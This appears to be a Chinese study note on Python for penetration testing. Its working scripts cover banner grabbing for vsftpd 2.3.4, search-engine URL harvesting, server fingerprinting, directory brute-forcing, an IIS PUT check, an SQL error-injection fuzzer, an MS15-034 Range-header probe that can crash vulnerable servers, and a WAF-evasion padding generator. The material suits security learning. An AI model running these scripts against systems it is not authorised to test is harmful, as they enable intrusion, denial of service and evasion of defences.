文章目录
基础语法部分
本文很水,只是随心记录,不喜勿喷,大佬绕过
socket
所谓套接字(Socket),就是对网络中不同主机上的应用进程之间进行双向通信的端点的抽象。一个套接字就是网络上进程通信的一端,提供了应用层进程利用网络协议交换数据的机制。从所处的地位来讲,套接字上联应用进程,下联网络协议栈,是应用程序通过网络协议进行通信的接口,是应用程序与网络协议栈进行交互的接口
if语句
for循环
函数
异常处理
异常处理—传送门
线程
argparse基本用法
用于传递用户输入的参数
argparse基本用法----传送门
获取banner(服务名称和版本)信息
工具获取banner信息
python获取banner信息
代码改进1—添加if语句判断2.3.4是否在banner信息中
可见if目录
代码改进2–添加try
代码改进3–创建函数并调用
可见函数目录
import socket
#获取banner信息函数
def getBanner(ip, port):
    """Connect to ip:port and return the service banner as a string.

    Returns None when the connection, read, or port conversion fails
    (best-effort probe, so unreachable hosts are not fatal).
    """
    # Cap every socket operation at 2 seconds so dead hosts fail fast.
    socket.setdefaulttimeout(2)
    try:
        s = socket.socket()
        try:
            # Original bug: s.connect(ip.port) — connect() takes a single
            # (host, port) tuple; int() also tolerates a string port.
            s.connect((ip, int(port)))
            banner = s.recv(1024)
        finally:
            # Close even when recv/connect raises (original leaked here).
            s.close()
        # Decode so callers can test substrings like "2.3.4" in py3.
        return banner.decode(errors='replace')
    except (OSError, ValueError):
        return None
# Check whether the banner advertises the vulnerable vsftpd 2.3.4 release.
def checkVulns(banner):
    """Print whether *banner* contains the vulnerable "2.3.4" version string.

    Accepts str or bytes (socket.recv returns bytes, and ``"2.3.4" in b"..."``
    raises TypeError in Python 3 — the original bug).  Returns True when the
    version matched, False otherwise, so callers may also branch on it.
    """
    if isinstance(banner, bytes):
        banner = banner.decode(errors='replace')
    if "2.3.4" in banner:
        print('vulnerable')
        return True
    print('unvulnerable')
    return False
if __name__ == '__main__':
    ip1 = '192.168.1.1'
    ip2 = '192.168.1.2'
    port = 21  # FTP control port (was the string '21')
    # Original bug: banner2 was assigned checkVulns() — the wrong function,
    # called with no arguments.  Both hosts must go through getBanner.
    for ip in (ip1, ip2):
        banner = getBanner(ip, port)
        # When a banner came back, report the host and test it for the
        # vulnerable version; otherwise note that nothing was found.
        if banner:
            print(ip)
            checkVulns(banner)
        else:
            print('no find')
编写poc和exp
编写poc和exp----传送门
正则表达,网络编程,套接字
模块部分
模块的概念
模块导入
python脚本基础结构
sys模块
文件操作
传送门—文件操作
os模块
基础阶段脚本
百度url收集脚本
#coding:utf-8
#!/usr/bin/env python
# code by aedoo
# github: https://github.com/aedoo/
import requests,Queue,sys,threading,time
from bs4 import BeautifulSoup
import re
class BaiDuUrlSpider(threading.Thread):
    # Worker thread: pulls Baidu search-result page URLs off a shared queue,
    # resolves every tracked result link on each page and appends the final
    # URLs to two output files.  (Python 2 code: print statements, Queue.)
    def __init__(self,queue):
        threading.Thread.__init__(self)
        # Queue of result-page URLs, shared by all workers.
        self.__queue = queue
    def run(self):
        # Drain the queue; each item is one Baidu results page.
        # NOTE(review): empty()/get() is not atomic across threads — a late
        # worker can still raise Queue.Empty, which the except below hides.
        while not self.__queue.empty():
            page_url = self.__queue.get(timeout=0.5)
            try:
                self.spider(page_url)
            except Exception,e:
                # Best-effort crawl: per-page failures are ignored.
                pass
    def spider(self,page_url):
        # Fetch one result page and follow each redirect-tracking link.
        f1 = open('original_url.txt','a+')
        f2 = open('home_url.txt','a+')
        r = requests.get(url=page_url, headers=head)
        soup = BeautifulSoup(r.content,'lxml')
        # Organic result links carry a 'data-click' attribute and no class.
        raw_url = soup.find_all(name='a',attrs={'data-click':re.compile('.'),'class':None})
        for raw in raw_url:
            # print raw['href']
            trick_url = raw['href']
            # Follow Baidu's redirector to reach the real destination URL.
            response = requests.get(url=trick_url,headers=head,timeout=3)
            if response.status_code==200:
                print response.url
                original_url = response.url
                f1.write(original_url+'\n')
                url_tmp = response.url
                url_list = url_tmp.split('/')
                # scheme + '//' + host, e.g. 'https://example.com'
                print url_list[0]+'//'+url_list[2]
                home_url = url_list[0]+'//'+url_list[2]
                f2.write(home_url+'\n')
            else:
                print response.status_code
        f1.close()
        f2.close()
def main():
    # Build the queue of Baidu search pages for the keyword given on the
    # command line, then fan out worker threads to crawl them.
    global head
    head = {
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, sdch, br',
        'Accept-Language': 'zh-CN,zh;q=0.8',
    }
    queue = Queue.Queue()
    threads = []
    threads_count = 200 # worker thread count; best kept <= number of pages crawled
    if len(sys.argv)!=2:
        print 'python Usage: %s keyword'% sys.argv[0]
        sys.exit(-1)
    else:
        keyword = sys.argv[1]
    for i in range(0,750,10): # Baidu caps at ~75 pages of 10 results; pn is the result offset
        url_start = 'https://www.baidu.com/s?wd=' + keyword + '&rn=10&pn=' # base search URL
        url = url_start+str(i)
        queue.put(url)
    for i in range(threads_count):
        threads.append(BaiDuUrlSpider(queue))
    for i in threads:
        i.start()
    for i in threads:
        i.join()
if __name__ == '__main__':
    # Truncate both output files so each run starts from a clean slate
    # (the workers open them in append mode).
    f1 = open('original_url.txt','w')
    f1.close()
    f2 = open('home_url.txt','w')
    f2.close()
    time_start = time.time()
    main()
    # Report total crawl time in seconds.
    print time.time()-time_start
四大件收集脚本
import requests
import os
import socket
import time
import optparse
from bs4 import BeautifulSoup
def main():
    """Parse the command-line options and dispatch to the matching probe.

    Exactly one probe runs per invocation, checked in the original
    priority order (-x, -t, -j, -g); with no option given, the help
    text is printed and the process exits.
    """
    usage = ('-x 判断系统类型'
             '-t 判断数据库类型'
             '-g 判断服务架构'
             '-j 判断网站语言')
    parser = optparse.OptionParser(usage)
    parser.add_option('-x', dest='system', help='判断系统,判断原理通过目录来判断例:https://www.btime.com/finance')
    parser.add_option('-t', dest='database', help='判断数据库,通过端口来判断数据库类型')
    parser.add_option('-g', dest='headerss', help='判断架构')
    parser.add_option('-j', dest='language', help='判断语言')
    options, _args = parser.parse_args()
    # (value, handler) pairs in the same order as the original if/elif chain.
    dispatch = (
        (options.system, SYSTEM),
        (options.database, DATABASE),
        (options.language, LANGUAGE),
        (options.headerss, HEADERSS),
    )
    for value, handler in dispatch:
        if value:
            handler(value)
            return
    parser.print_help()
    exit()
def SYSTEM(system):
    """Guess the target OS via path case-sensitivity.

    Requests the URL as given and again with the last character upper-cased.
    Linux filesystems are case-sensitive, so differing response bodies
    suggest Linux; identical bodies suggest Windows.

    NOTE(review): assumes the URL ends in a letter of a path component —
    trailing '/' or a digit makes the probe a no-op; confirm with callers.
    """
    sc = "{}".format(system)
    gs = sc[-1].capitalize()
    # Original bug: sc.strip(sc[-1]) removes *every* leading and trailing
    # occurrence of that character, mangling URLs that start or end with
    # repeats of it.  Slicing off exactly the last character is the intent.
    url = sc[:-1] + gs
    sg = requests.get(url)
    print(sg.url)
    a = requests.get(sc).content
    b = requests.get(url).content
    if a != b:
        print('系统是:Linux')
    else:
        print('系统是:windows')
def DATABASE(database):
    """Probe the well-known database ports (MSSQL 1433, Oracle 1521,
    MySQL 3306) on *database* and print which ones accept connections.

    A fresh socket is created for every attempt: the original reused a
    single socket, but a socket object cannot connect() again after a
    failed or completed connection, so the 2nd and 3rd probes always
    reported "closed".
    """
    probes = (
        (1433, '[+]MSSQL数据库开放', '[-]1433关闭'),
        (1521, '[+]oracle数据库开放', '[-]1521端口关闭'),
        (3306, '[+]MYSQL数据库开放', '[-]3306关闭'),
    )
    for port, open_msg, closed_msg in probes:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.settimeout(3)
            s.connect((database, port))
            print(open_msg)
        except OSError:
            print(closed_msg)
        finally:
            s.close()
        # Brief pause between probes, as in the original.
        time.sleep(0.1)
def HEADERSS(headerss):
    """Print protocol scheme, status code, server software and content type
    for the given URL."""
    from urllib.parse import urlsplit
    url = "{}".format(headerss)
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
    r = requests.get(url, headers=headers)
    # Original bug: printed url[0]..url[3], i.e. the four characters
    # 'h' 't' 't' 'p' — report the actual URL scheme instead.
    print('[+]协议类型:', urlsplit(url).scheme, '/', r.status_code)
    # Servers may omit these headers; .get() avoids a KeyError.
    print('[+]服务架构:', r.headers.get('Server', 'unknown'))
    print('[+]页面类型', r.headers.get('Content-Type', 'unknown'))
def LANGUAGE(language):
    """Report the server-side language/framework from the X-Powered-By header."""
    url = "{}".format(language)
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
    g = requests.get(url, headers=headers)
    # Original used a bare except, which also swallowed Ctrl-C and real
    # bugs; only a missing header (KeyError) is expected here.
    try:
        print('[+]程序支持', g.headers['X-Powered-By'])
    except KeyError:
        print('[-]没有找出该网站的程序支持')
if __name__ == '__main__':
    # Run the CLI dispatcher only when executed as a script.
    main()
多线程获取banner信息
# Original first line read "mport socket" — the leading "i" was lost.
import socket
import argparse
import threading
import sys
import os

# CLI: -r a file of target IPs (one per line), -p the single port to probe.
parse = argparse.ArgumentParser(description="You can try : python banner.py -r ip.txt -p 21")
parse.add_argument('-r', '--dic', dest='diction', help='Please enter your dictionary', type=str)
parse.add_argument('-p', '--port', dest='port', help='Please enter your port', type=int)
args = parse.parse_args()
ip_dir = args.diction
port = args.port
# Banner-grabbing helper.
def getBanner(ip, port):
    """Connect to ip:port and return the service banner as a string,
    or None when the connection or read fails (best-effort probe)."""
    # Cap every socket operation at 2 seconds so dead hosts fail fast.
    socket.setdefaulttimeout(2)
    try:
        s = socket.socket()
        try:
            # Original bug: s.connect(ip.port) — connect() takes a single
            # (host, port) tuple, not an attribute access.
            s.connect((ip, int(port)))
            banner = s.recv(1024)
        finally:
            # Close even when recv/connect raises (original leaked here).
            s.close()
        # Decode so "2.3.4" in banner works in Python 3.
        return banner.decode(errors='replace')
    except (OSError, ValueError):
        return None
# Vulnerability check: grab the banner and look for vsftpd 2.3.4.
def checkVulns(ip, port):
    """Fetch the banner from ip:port and print whether it advertises the
    vulnerable "2.3.4" release (combined with getBanner so one thread
    handles the whole probe)."""
    banner = getBanner(ip, port)
    if banner:
        # socket.recv returns bytes; in Python 3 `"2.3.4" in b"..."`
        # raises TypeError, so normalize to str first.
        if isinstance(banner, bytes):
            banner = banner.decode(errors='replace')
        if "2.3.4" in banner:
            print('vulnerable')
        else:
            print('unvulnerable')
    else:
        print(ip + ' ' + 'not get banner')
# Entry point: read the IP list and probe each host on its own thread.
def main():
    """Spawn one checkVulns thread per IP in the -r dictionary file and
    wait for all of them to finish."""
    try:
        with open(ip_dir, 'r') as f:
            threads = []
            for line in f:
                ip = line.strip()
                if not ip:
                    continue  # skip blank lines in the dictionary
                t = threading.Thread(target=checkVulns, args=(ip, port))
                t.start()
                threads.append(t)
            # Join so the process does not exit before the probes report
            # (the original fired-and-forgot its threads).
            for t in threads:
                t.join()
    except Exception as f:
        print('你的错误是:%s' % f)


if __name__ == '__main__':
    main()
目录扫描工具
# Original first line read "mport argparse" — the leading "i" was lost.
import argparse
import requests
import sys
def main():
    """Directory brute-forcer: GET url+word for every word in the
    dictionary file and report each path that answers 200."""
    parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
    # '--uesr' was a typo for '--user'; the short flag -u and dest are unchanged.
    parse.add_argument('-u', '--user', dest='name', help='Please enter your url', type=str)
    parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)
    args = parse.parse_args()
    url = args.name
    diction = args.diction
    try:
        with open(diction, "r") as f:
            for line in f:
                line = line.strip()
                # A 200 reply means the candidate path exists on the target.
                r = requests.get(url + line)
                if r.status_code == 200:
                    print("find it:" + r.url)
    except Exception as e:
        print(str(e))
if __name__ == '__main__':
    # Run the scanner only when executed as a script.
    main()
PUT写入
import requests

url = 'http://192.168.1.103'
# An OPTIONS request reveals which HTTP verbs the server accepts.
r = requests.options(url)
#print(r.headers['Allow'])
# IIS advertises verbs in 'Public'; .get() avoids a KeyError when absent.
result = r.headers.get('Public', '')
# Original bug: str.find() returns -1 (which is truthy) when the substring
# is absent, so the check always passed; use substring membership instead.
if "PUT" in result and "MOVE" in result:
    print(result)
    print('exist iis put vuln')
else:
    print('no find')
获取服务器版本和脚本类型
import requests

# Prompt for the target; the value must include the scheme, e.g. http://host
a = input('请写入ip或域名:')
url = a
r = requests.get(url)
# Original indexed the headers directly and crashed with KeyError when a
# server omits them; .get() substitutes a placeholder instead.
print('中间件:' + r.headers.get('Server', 'unknown'))
print('服务器语言:' + r.headers.get('X-Powered-By', 'unknown'))
sql爆错注入poc
import argparse
import requests
import sys
import math
# CLI: -u takes a URL containing the literal marker FUZZ (replaced by each
# payload); -d is the payload dictionary file.
parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
parse.add_argument('-u', '--uesr', dest='url', help='Please enter your url', type=str)
parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str)
args = parse.parse_args()
# Module-level settings shared by the functions below.
url = args.url
sql_fuzz_dic = args.diction
def get_urls():
    """Expand the FUZZ marker in the global *url* with every payload from
    the global dictionary file and return the resulting list of URLs."""
    with open(sql_fuzz_dic, 'r') as handle:
        payload_lines = handle.readlines()
    # One candidate URL per (whitespace-stripped) payload line.
    return [url.replace("FUZZ", line.strip()) for line in payload_lines]
# Expand the payload dictionary into the candidate URL list at import time.
inject_urls = get_urls()
#for i in inject_urls:
#print(i)
result_list = [] # stores the URLs where SQL injection was confirmed
def text_sql():
    """Request every candidate URL and report the ones whose response body
    contains the MySQL error signature "SQL syntax"."""
    for candidate in inject_urls:
        r = requests.get(url=candidate)
        print('testing url:')
        print(r.url)
        # Original bug: .find() returns -1 (truthy) on a miss, so *every*
        # URL was flagged; substring membership is the correct test.
        if "SQL syntax" in r.text:
            result_list.append(r.url)
    # Original bug: `result_list == 0` compares a list with an int and is
    # always False; an empty list is what means "nothing injectable".
    if not result_list:
        print('no sql')
    else:
        print('find it')
        for hit in result_list:
            print(hit)
ms15_04 poc
import requests

a = input('请输入MS_15_034 IP或域名:')
url = a
# The oversized Range header triggers the MS15-034 integer overflow in HTTP.sys.
header = {
    'Host': 'stuff',
    'Range': 'bytes=0-18446744073709551615'
}
r = requests.get(url, headers=header)
server = r.headers.get('Server', '')
# Original bug: str.find() returns -1 (truthy) when the substring is absent,
# so every server matched and every body "matched"; use `in` instead.
if 'IIS/7.5' in server or 'IIS/8.0' in server:
    if 'Requested Range Not Satisfiable' in r.text:
        print('find ms15_035')
    else:
        pass
else:
    print('no find')
万能绕waf脚本(只能部分)
#coding=utf-8
import random,string
from urllib import parse
# code by yzddMr6
# Length bounds for each random parameter name.
varname_min = 5
varname_max = 15
# Length bounds for each random parameter value.
data_min = 20
data_max = 25
# Bounds controlling how many junk key=value pairs are generated
# (num_max - num_min iterations).
num_min = 50
num_max = 100
def randstr(length):
    """Return a random string of ASCII letters of the given length."""
    letters = (random.choice(string.ascii_letters) for _ in range(length))
    return ''.join(letters)
def main():
    """Build a blob of random key=value pairs, urlencode it and print it
    wrapped in '&' — junk padding meant to push the real payload past a
    WAF's inspection window."""
    padding = {}
    for _ in range(num_min, num_max):
        name = randstr(random.randint(varname_min, varname_max))
        padding[name] = randstr(random.randint(data_min, data_max))
    print('&' + parse.urlencode(padding) + '&')


main()